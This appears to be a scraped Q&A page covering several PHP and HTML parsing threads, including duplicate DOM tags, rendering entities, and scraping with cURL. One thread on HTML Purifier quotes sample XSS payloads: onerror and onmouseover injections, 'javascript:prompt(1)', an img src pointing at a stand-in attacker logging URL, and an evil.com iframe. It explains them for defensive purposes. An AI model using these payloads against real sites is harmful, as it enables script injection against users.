Multiple html, head, body found with PHP xPath - php

I'm using CURL, DOMDocument, loadHTML, DOMXPath in PHP to get the contents of URLs. In order to verify the validity of the data, I also run checks on the amount of html, head and body tags that were retrieved.
My setup is working fine for the large majority of URLs I enter. However, for some URLs, an unexpected amount of those tags in reported. The xPaths:
$html = $this->runXpath('/html');
$head = $this->runXpath('/html/head');
$body = $this->runXpath('/html/body');
And the check:
if($html->length > 1) {
echo 'Too many html tags';
}
https://www.chownow.com/: 2x HTML (yes, I see the iframe, but that is generated through Javascript, which CURL shouldn't render? Also, the xpath states that the html should be a child of #document - which, according to $tag->parentNode->nodeName both HTML elements are? The second HTML tag also doesn't show up in neither 'View source' nor the responsebody from the CURL request).
http://neilpatel.com/: 2x HTML? (Once again a video, but seemingly not even a relevant iframe tag in the DOM source).
https://www.groovehq.com/: 2x BODY? (An iframe again, but no double html error, but a double body error instead?).
Questions
Why does xpath seem to think there are multiple instances of those tags, while I can't find them as such in the CURL response body using ctrl-f when I output it, nor in 'View source'?
How can I "see what xpath sees" in order to debug similar cases?
It would almost seem that DOMDocument or xpath parses javascript, does it? If not, how do I explain the examples above?
Any additional questions I will gladly answer. Thanks in advance!

Related

XSS vulnerabilities still exist even after using HTML Purifier

I'm testing one of my web application using Acunetix. To protect this project against XSS attacks, I used HTML Purifier. This library is recommended by most of PHP developers for this purpose, but my scan results shows HTML Purifier can not protect us from XSS attacks completely. The scanner found two ways of attack by sending different harmful inputs:
1<img sRc='http://attacker-9437/log.php? (See HTML Purifier result here)
1"onmouseover=vVF3(9185)" (See HTML Purifier result here)
As you can see results, HTML Purifier could not detect such attacks. I don't know if is there any specific option on HTML Purifier to solve such problems, or is it really unable to detect these methods of XSS attacks.
Do you have any idea? Or any other solution?
(This is a late answer since this question is becoming the place duplicate questions are linked to, and previously some vital information was only available in comments.)
HTML Purifier is a contextual HTML sanitiser, which is why it seems to be failing on those tasks.
Let's look at why in some detail:
1<img sRc='http://attacker-9437/log.php?
You'll notice that HTML Purifier closed this tag for you, leaving only an image injection. An image is a perfectly valid and safe tag (barring, of course, current image library exploits). If you want it to throw away images entirely, consider adjusting the HTML Purifier whitelist by setting HTML.Allowed.
That the image from the example is now loading a URL that belongs to an attacker, thus giving the attacker the IP of the user loading the page (and nothing else), is a tricky problem that HTML Purifier wasn't designed to solve. That said, you could write a HTML Purifier attribute checker that runs after purification, but before the HTML is put back together, like this:
// a bit of context
$htmlDef = $this->configuration->getHTMLDefinition(true);
$image = $htmlDef->addBlankElement('img');
// HTMLPurifier_AttrTransform_CheckURL is a custom class you've supplied,
// and checks the URL against a white- or blacklist:
$image->attr_transform_post[] = new HTMLPurifier_AttrTransform_CheckURL();
The HTMLPurifier_AttrTransform_CheckURL class would need to have a structure like this:
class HTMLPurifier_AttrTransform_CheckURL extends HTMLPurifier_AttrTransform
{
public function transform($attr, $config, $context) {
$destination = $attr['src'];
if (is_malicious($destination)) {
// ^ is_malicious() is something you'd have to write
$this->confiscateAttr($attr, 'src');
}
return $attr;
}
}
Of course, it's difficult to do this 'right':
if this is a live check with some web-service, this will slow purification down to a crawl
if you're keeping a local cache you run risk of having outdated information
if you're using heuristics ("that URL looks like it might be malicious based on indicators x, y and z"), you run risk of missing whole classes of malicious URLs
1"onmouseover=vVF3(9185)"
HTML Purifier assumes the context your HTML is set in is a <div> (unless you tell it otherwise by setting HTML.Parent).
If you just feed it an attribute value, it's going to assume you're going to output this somewhere so the end-result looks like this:
...
<div>1"onmouseover=vVF3(9185)"</div>
...
That's why it appears to not be doing anything about this input - it's harmless in this context. You might even not want to strip this information in that context. I mean, we're talking about this snippet here on stackoverflow, and that's valuable (and not causing a security problem).
Context matters. Now, if you instead feed HTML Purifier this snippet:
<div class="1"onmouseover=vVF3(9185)"">foo</div>
...suddenly you can see what it's made to do:
<div class="1">foo</div>
Now it's removed the injection, because in this context, it would have been malicious.
What to use HTML Purifier for and what not
So now you're left to wonder what you should be using HTML Purifier for, and when it's the wrong tool for the job. Here's a quick run-down:
you should use htmlspecialchars($input, ENT_QUOTES, 'utf-8') (or whatever your encoding is) if you're outputting into a HTML document and aren't interested in preserving HTML at all - it's unnecessary overhead and it'll let some things through
you should use HTML Purifier if you want to output into a HTML document and allow formatting, e.g. if you're a message board and you want people to be able to format their messages using HTML
you should use htmlspecialchars($input, ENT_QUOTES, 'utf-8') if you're outputting into a HTML attribute (HTML Purifier is not meant for this use-case)
You can find some more information about sanitising / escaping by context in this question / answer.
All the HTML purifier seems to be doing, from the brief look that I gave, was HTML encode certain characters such as <, > and so on. However there are other means of invoking JS without using the normal HTML characters:
javascript:prompt(1) // In image tags
src="http://evil.com/xss.html" // In iFrame tags
Please review comments (by #pinkgothic) below.
Points below:
This would be HTML injection which does effectively lead to XSS. In this case, you open an <img> tag, point the src to some non-existent file which in turn raises an error. That can then be handled by the onerror handler to run some JavaScript code. Take the following example:
<img src=x onerror=alert(document.domain)>
The entrypoint for this it generally accompanied by prematurely closing another tag on an input. For example (URL decoded for clarity):
GET /products.php?type="><img src=x onerror=prompt(1)> HTTP/1.1
This however, is easily mititgated by HTML escaping meta-character (i.e. <, >).
Same as above, except this could be closing off an HTML attribute instead of a tag and inserting its own attribute. Say you have a page where you can upload the URL for an image:
<img src="$USER_DEFINED">
A normal example would be:
<img src="http://example.com/img.jpg">
However, inserting the above payload, we cut off the src attribute which points to a non-existent file and inject an onerror handler:
<img src="1"onerror=alert(document.domain)">
This executes the same payload mentioned above.
Remediation
This is heavily documented and tested in multiple places, so I won't go into detail. However, the following two articles are great on the subject and will cover all your needs:
https://www.acunetix.com/websitesecurity/cross-site-scripting/
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

HTML doesn't get rendered, why does it happen?

On a PHP+MySQL project, there's a string of text coming from a MySQL table that contains HTML tags but those tags never get rendered by Google Chrome or any browser I tried yet:
You can see that the HTML (p, strong) aren't getting interpreted by the browser.
So the result is:
EDIT: HTML/PHP
<div class="winery_description">
<?php echo $this->winery['description']; ?>
</div>
$this->winery being the array result of the SQL Select.
EDIT 2: I'm the dumbest man in the world, the source contains entities. So the new question is: How do I force entities to be interpreted?
Real source:
Any suggestions? Thanks!
You are probably using innerText or textContent to set the content of your div, which just replace the child nodes of the div with a single text node.
Use innerHTML instead, to have the browser parse the HTML and create the appropriate DOM nodes.
The answer provided by #Paulpro is correct.
Also note that if you are using jQuery, be sure to use the .html() method instead of .text() method:
$('#your_element').html('<h1>This works!</h1>');
$('#another_element').text('<h2>Wrong; you will see the <h2> in the output');

a php implementation of a certain jquery script. Finding a parent of p element with text of certain length

I found this library, php query, and I wanted to know how I can utilize this jquery:
var source = $('p:not(:has(iframe))').filter(function(){
return $(this).text().length > 150;})
.slice(0,1).parent();
It finds the the first p element without an iframe that has text longer than 150 characters and takes its parent, I was wondering how I could do this in a php library. I found phpquery, a php implementation of jquery, but I've been confused on how to properly convert this above script.
try using http://simplehtmldom.sourceforge.net/manual.htm
you can Find tags on an HTML page with selectors just like jQuery.
just read the simple manual

PHP Simple HTML DOM Parser denies to handle [invalid] HTML - first trial fails

g day dear community - hello all!
well I am trying to select either a class or an id using PHP Simple HTML DOM Parser with absolutely no luck. Perhaps i have to study the manpages again and again.
Well - the DOM-technique somewhat goes over my head:
But my example is very simple and seems to comply to the examples given in the manual (simplehtmldom.sourceforge AT net/manual.htm) but it just wont work, it's driving me up the wall. Other example scripts given with simple dom work fine.
See the example: http://www.aktive-buergerschaft.de/buergerstiftungsfinder
This is the easiest example i have found ... The question is - how to parse it?
Should i do it with Perl - The example HTML page is invalid HTML.
I do not know if the Simple HTML DOM Parser is able to handle badly malformed HTML
(probably not). And then i am lost.
Well: it is pretty hard to believe - but you can get the content with file_get_contents: But you afterwards have to do the parser job! And there i have some missing parts!
Finally: if i cannot get it to run i can try out some Perl parsers eg HTML::TreeBuilder::XPath
1: check whether file_get_contents is working!!!!
2: If no use curl or fopen or telnet to read the data.
Simple Html Dom filters all the noise can process malformed tags also...
Problem might be with your data retrieving

How do I screen scrape a website and get data within div?

How can I screen scrape a website using cURL and show the data within a specific div?
Download the page using cURL (There are a lot of examples in the documentation). Then use a DOM Parser, for example Simple HTML DOM or PHPs DOM to extract the value from the div element.
After downloading with cURL use XPath to select the div and extract the content.
A possible alternative.
# We will store the web page in a string variable.
var string page
# Read the page into the string variable.
cat "http://www.abczyx.com/path/to/page.ext" > $page
# Output the portion in the third (3rd) instance of "<div...</div>"
stex -r -c "^<div&</div\>^3" $page
This code is in biterscripting. I am using the 3 as sample to extract 3rd div. If you want to extract the div that has say string "ABC", then use this command syntax.
stex -r -c "^<div&ABC&</div\>^" $page
Take a look at this script http://www.biterscripting.com/helppages/SS_ExtractTable.html . It shows how to extract an element (div, table, frame, etc.) when the elements are nested.
Fetch the website content using a cURL GET request. There's a code sample on the curl_exec manual page.
Use a regular expression to search for the data you need. There's a code sample on the preg_match manual page, but you'll need to do some reading up on regular expressions to be able to build the pattern you need. As Yacoby mentioned which I hadn't thought of, a better idea may be to examine the DOM of the HTML page using PHP's Simple XML or DOM parser.
Output the information you've found from the regex/parser in the HTML of your page (within the required div.)

Categories